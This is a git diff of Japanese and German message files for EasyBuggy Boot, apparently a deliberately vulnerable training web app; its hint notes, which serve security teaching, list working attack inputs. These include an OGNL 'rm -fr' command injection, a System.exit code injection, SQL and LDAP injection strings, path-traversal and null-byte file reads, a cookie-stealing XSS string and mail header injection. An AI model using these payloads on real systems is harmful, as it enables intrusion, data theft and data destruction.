msg.note.clickjacking=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 -msg.note.code.injection={}');java.lang.System.exit(0);//\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3067 JavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 msg.note.dangerous.file.inclusion=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=[\u60aa\u610f\u306e\u3042\u308bJSP\u30d5\u30a1\u30a4\u30eb\u304c\u30c7\u30d7\u30ed\u30a4\u3055\u308c\u305fURL]\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 msg.note.db.connection.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.dead.lock.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u9023\u7d9a\u3067\u6570\u56de\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.enter.count=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.enter.large.number=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -msg.note.enter.one=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.enter.specific.nembers=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.enter.decimal.value=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.enter.runtime.exec=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -msg.note.positive.number=63\u4ee5\u4e0a\u306e\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u3067\u306fCookie\u3092\u6271\u3048\u306a\u3044\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u3092\u30b5\u30dd\u30fc\u30c8\u3059\u308b\u76ee\u7684\u3067URL\u30ea\u30e9\u30a4\u30c8\u304c\u6a5f\u80fd\u3057\u307e\u3059\u3002\u305d\u308c\u306b\u3088\u308a\u3001\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u304c\u53ef\u80fd\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002 -msg.note.slow.regular.expression=\u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u69cb\u6587\u89e3\u6790\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002
\n \u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5fdc\u7b54\u304c\u8fd4\u3089\u306a\u304f\u306a\u308a\u307e\u3059\u3002 -msg.note.slow.string.plus.operation=+(\u30d7\u30e9\u30b9)\u6f14\u7b97\u5b50\u3067\u6587\u5b57\u5217\u3092\u9023\u7d50\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u751f\u6210\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002 -msg.note.sql.deadlock=2\u3064\u306e\u30a6\u30a4\u30f3\u30c9\u30a6\u307e\u305f\u306f\u30bf\u30d6\u3092\u958b\u304d\u3001\u4e00\u65b9\u3067\u30e6\u30fc\u30b6\u30fcID\u3092\u964d\u9806\u306b\u30bd\u30fc\u30c8\u3057\u3066\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u305f\u76f4\u5f8c\u306b\u3001\u3082\u3046\u4e00\u65b9\u3067\u6607\u9806\u306e\u307e\u307e\n\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u3067\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.sql.injection=Mark\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u30d1\u30b9\u30ef\u30fc\u30c9\u306b' OR '1'\='1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4ed6\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u60c5\u5831\u304c\u8868\u793a\u3067\u304d\u307e\u3059\u3002 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n*)(|(objectClass\=*\u3001aaaaaaa)\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u8a8d\u8a3c\u3092\u8fc2\u56de\u3057\u3066\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002 -msg.note.mail.header.injection=\u30d6\u30e9\u30a6\u30b6\u306e\u958b\u767a\u8005\u30e2\u30fc\u30c9\u3067\u4ef6\u540d\u306einput\u30bf\u30b0\u3092textarea\u30bf\u30b0\u306b\u5909\u66f4\u3057\u3001\u300c[\u4efb\u610f\u4ef6\u540d][\u6539\u884c]Bcc\: [\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u300d\u3092\u5165\u529b\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3001[\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=\u6587\u5b57\u5217\u306b\u65e5\u672c\u8a9e\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.null.byte.injection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\u524d\u306eJava\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bfileName\=../WEB-INF/web.xml%00\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001web.xml\u306e\u5185\u5bb9\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bgoto\=[\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL]\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001\u30c1\u30a7\u30c3\u30af\u305b\u305a\u306b\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3057\u307e\u3059\u3002 -msg.note.socket.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.unrestricted.ext.upload=<% System.exit(0); %>\u3068\u66f8\u3044\u305fJSP\u30d5\u30a1\u30a4\u30eb(\u30d5\u30a1\u30a4\u30eb\u540d\uff1aexit.jsp)\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001http\://localhost\:8080/uploadFiles/exit.jsp\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\nJavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u753b\u9762\u3067\u306e\u8a8d\u8a3c\u30a8\u30e9\u30fc\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u8a73\u7d30\u904e\u304e\u308b\u305f\u3081\u3001\u30ed\u30b0\u30a4\u30f3\u53ef\u80fd\u306a\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u63a8\u6e2c\u3057\u3084\u3059\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002 msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 @@ -295,16 +295,16 @@ msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 msg.update.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u66f4\u65b0\u3067\u304d\u307e\u3059\u3002 msg.update.users=\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u3092\u4e00\u62ec\u3067\u66f4\u65b0\u3057\u307e\u3059\u3002 msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.thread.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u305b\u3093\u3002 msg.user.already.exist=\u65e2\u306b\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u3059\u3002 msg.valid.json=\u6b63\u3057\u3044JSON\u6587\u5b57\u5217\u3067\u3059\u3002 msg.warn.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -section.change.mail=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4 -section.change.password=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4 -section.client.info=\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u60c5\u5831 +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=\u30c7\u30b6\u30a4\u30f3\u30c6\u30b9\u30c8 -section.server.info=\u30b5\u30fc\u30d0\u30fc\u60c5\u5831 +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=\u30e2\u30ce\u30af\u30ed\u30fc\u30e0 style.description.monochro=\u30e2\u30ce\u30af\u30ed\u306e\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 style.name.noframe=\u30d5\u30ec\u30fc\u30e0\u306a\u3057 style.description.noframe=\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u306f\u4f7f\u7528\u3055\u308c\u307e\u305b\u3093\u3002 -title.access.history=\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 -title.admins.main.page=\u7ba1\u7406\u8005\u5411\u3051\u30e1\u30a4\u30f3\u30da\u30fc\u30b8 +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=\u73fe\u5728\u65e5\u4ed8\u306e\u8868\u793a -title.current.thread.count=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a +title.threadleak.page=Display Current Thread Count title.current.time=\u73fe\u5728\u6642\u523b\u306e\u8868\u793a -title.detect.deadlock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306e\u691c\u77e5 -title.endless.waiting.page=\u30d0\u30c3\u30c1\u306e\u5b9f\u884c -title.guide.download=\u30ac\u30a4\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 -title.integer.overflow.page=\u6708\u307e\u3067\u306e\u8ddd\u96e2 +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=\u7ba1\u7406\u8005\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8 -title.loss.of.trailing.digits.page=\u5c0f\u6570\u306e\u8db3\u3057\u7b97 -title.mail.header.injection.page=\u7ba1\u7406\u8005\u3078\u306e\u554f\u3044\u5408\u308f\u305b -title.heap.memory.usage=\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf -title.nonheap.memory.usage=\u975e\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=\u6587\u5b57\u5217\u306e\u5148\u982d\u5927\u6587\u5b57\u5316 -title.ognl.expression.injection.page=\u6570\u5024\u51e6\u7406\u306e\u5b9f\u884c -title.parse.json=JSON\u306e\u89e3\u6790 -title.response.time=\u5fdc\u7b54\u6642\u9593\u306e\u6e2c\u5b9a -title.random.string.generator=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 -title.round.off.error.page=\u7c21\u5358\u306a\u5f15\u304d\u7b97 -title.slow.regular.expression.page=\u6b63\u898f\u8868\u73fe\u306e\u30c6\u30b9\u30c8 -title.sql.injection.page=\u6697\u8a3c\u756a\u53f7\u691c\u7d22 -title.sum.of.natural.numbers=\u81ea\u7136\u6570\u306e\u7dcf\u548c -title.timezone=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u60c5\u5831 -title.timezone.list=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306e\u4e00\u89a7 -title.truncation.error.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 -title.unrestricted.extension.upload=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db -title.unrestricted.size.upload=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 -title.user.list=\u30e6\u30fc\u30b6\u30fc\u4e00\u89a7 +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 -title.xee=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 -title.xxe=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From 79d3d559947f2e50bc48b6669641a22808f993fa Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:42 +0900 Subject: [PATCH 015/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. 